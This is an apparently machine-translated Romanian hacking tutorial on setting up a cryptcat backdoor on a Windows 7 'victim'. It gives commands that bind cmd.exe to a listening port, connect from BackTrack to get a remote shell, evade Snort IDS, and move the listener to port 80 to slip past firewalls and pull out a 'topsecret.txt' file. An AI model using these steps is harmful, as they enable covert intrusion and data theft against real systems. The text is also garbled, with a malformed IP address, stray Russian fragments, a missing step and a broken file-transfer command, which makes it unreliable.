Cum de a crea un backdoor pentru a cryptcat, care este aproape imposibil de detectat - iSearch - efektivnosti Poshuk în
Cryptcat ne permite să comunice între cele două sisteme, și criptează conexiunea dintre ele folosind twofish - unul dintre mulți algoritmi de criptare excelent.
Anterior, ne-am întâlnit cu un singur instrument Netcat mic. care vă permite să creați o conexiune între oricare două mașini și fișiere de transfer, sau pentru a crea un shell pentru sistemul de „maestru“. În ciuda frumusețea și eleganța acestui instrument mic, are un dezavantaj major - transmisia între computere pot fi detectate de dispozitivele de securitate, cum ar fi firewall-uri și sisteme de detectare a intruziunilor (IDS).
În această lecție, faceți cunoștință cu vărul populare de Netcat, cryptcat (este de fapt mult mai plăcut și mai exotice decât un simplu Netcat).
Deoarece criptarea twofish este pe picior de egalitate cu criptare AES, face cryptcat practic antiglonț. Astfel, IDS nu poate detecta un comportament dăunător chiar și atunci când rutele sale trec prin astfel de convenționale HTTP-porturile 80 și 443.
Pasul 1: Descărcați Cryptcat
Puteți descărca și instala pe sistemul cryptcat Windows aici.
Pasul 2: Deschideți ascultatorului pe un sistem Windows
Putem deschide ascultătorul pe orice sistem cu o sintaxă similară pentru Netcat. În cazul nostru, vom deschide ascultătorul pe un sistem Windows 7 pe portul 6996 și de a crea o carapace.
cryptcat -l -p 6996 -e cmd.exe
-L înseamnă „ascultare deschisă“
-p 6996 înseamnă „pentru a plasa ascultătorul în port 6996“
-e cmd.exe înseamnă „începe o comandă shell pentru comunicare“
Acum, să rulați tipul IDS Snort la un alt sistem, care se va conecta la sistemul Windows pentru a vedea dacă criptarea este „oarbă“ IDS este capabil, lăsând ușa înapoi invizibil pentru astfel de dispozitive de securitate.
Pasul 4: Conectarea la sistemul Windows cu Cryptcat
Cryptcat în mod implicit pe BackTrack. așa că nu trebuie să descărcați și instalați-l. În plus, acesta se află în / bin, astfel încât să putem accesa de pe orice director.
Acum conectați la sistemul de operare Windows 7 cryptcat din sistemul nostru BackTrack și să vedem dacă putem realiza backdoor de comunicare criptată, care este aproape imposibil de detectat.
cryptcat 192.168.4.182.248 6996
După cum vedeți, suntem conectați la Windows 7 și a primit o coajă de sistem Win 7! Acest lucru ne oferă un control considerabil asupra acestui sistem, dar nu totală, deoarece shell-ul are o capacitate limitată.
Pasul 5: busteni si alerte Proveote snort
Acest tip de atac (rețea cherezh pasaj shell) sunt ușor detectate prin Snort sau alte IDS, atunci când compusul nu este criptat. Snort reguli va alerta administratorul de sistem că cmd.exe shell-ul se execută o conexiune de rețea, iar acestea sunt susceptibile de a face ceva pentru a vă păstrați de la folosirea acestui shell. Cu o conexiune criptată, disponibil cu cryptcat, această relație este aproape imposibil de detectat.
Hai să ne întoarcem și să verificați jurnalele și alerte pentru a Snort. Dacă am avut succes în sustrage IDS, nu ar trebui să vedeți avertizarea cu privire la deplasarea cojii prin rețea. Ne putem testa revistele noastre, merge la / var / pufnet / alerte și de a vedea dacă există semnale din cauza conexiunii noastre la mașină pentru Windows (în mod normal, trebuie să găsim un avertisment).
După cum puteți vedea, am avut succes. Am fost în măsură să se conecteze la sistemul de operare Windows, fără a atrage atenția oricare dintre dispozitivele de siguranță!
Pasul 6: Trimite Crypcat prin portul 80, pentru a evita firewall
Deși am creat cu succes un backdoor criptat pe sistemul victimei, un administrator de securitate mai atentă se va observa că un port deschis neobișnuit (6996). Acest lucru este de natură să inițieze orice acțiune de către administratorul de securitate, pentru a restricționa accesul nostru. În plus, în sistemele cu un administrator de sistem bun și un firewall bun, acest port este probabil să fie blocat de un paravan de protecție.
Pentru orice rețea să fie capabil să comunice pe Internet este de natură să păstreze porturile deschise 80 și 443, dar, de asemenea, posibil, 25, 53 și 110. Ca și în traficul normal pe Internet necriptat trece prin portul 80, care este aproape întotdeauna deschisă , ușoara creștere a traficului este greu de observat.
Acum, că ne-am folosit cu succes cryptcat, vom trimite prin portul 80 cu restul traficului pe Internet. Deși este criptat, dar se va arata ca orice date binare transmise pe linie. Prin urmare, va fi aproape imposibil de detectat dispozitive de securitate să-l blocheze, deoarece acestea au întotdeauna pentru a permite traficul pe portul 80, iar traficul este criptat și IDS nu va fi în măsură să „vadă“ conținutul.
Aici vom muta fișierul din sistemul victimei cu numele topsecret.txt la sistemul nostru de atac, fără a identifica cu orice dispozitiv de securitate. De data aceasta, în loc de a trimite un shell prin intermediul rețelei, vom trimite un fișier de top secret numit topsecret.txt prin conexiunea noastră criptată. Putem face acest lucru prin tastarea în fereastra de comandă pentru Windows:
cryptcat -l -p 80 -L înseamnă „ascultare deschisă“ cryptcat 192.168.182.248 80
-p 80 este „ascultare deschis pe 80 porturi“
<означает "отправить файл через этого слушателя"
După cum puteți vedea, fișierul a trecut prin relația noastră este de succes!
Să ne verifica încă o dată fișierele noastre jurnal pufnet dovezi că IDS noastre nu a dezvaluit traficul de top secret de fișier.
După cum puteți vedea, fișierul nostru de top-secret, este mutat prin portul 80 sub nasul administratorilor de sistem, IDS, și firewall-ul fără urmă!
Cryptcat - acesta este un instrument de mare mic pentru mutarea datelor din afara sistemului victimei prin porturile deschise, în mod normal, fără a fi detectate prin orice dispozitive de siguranță.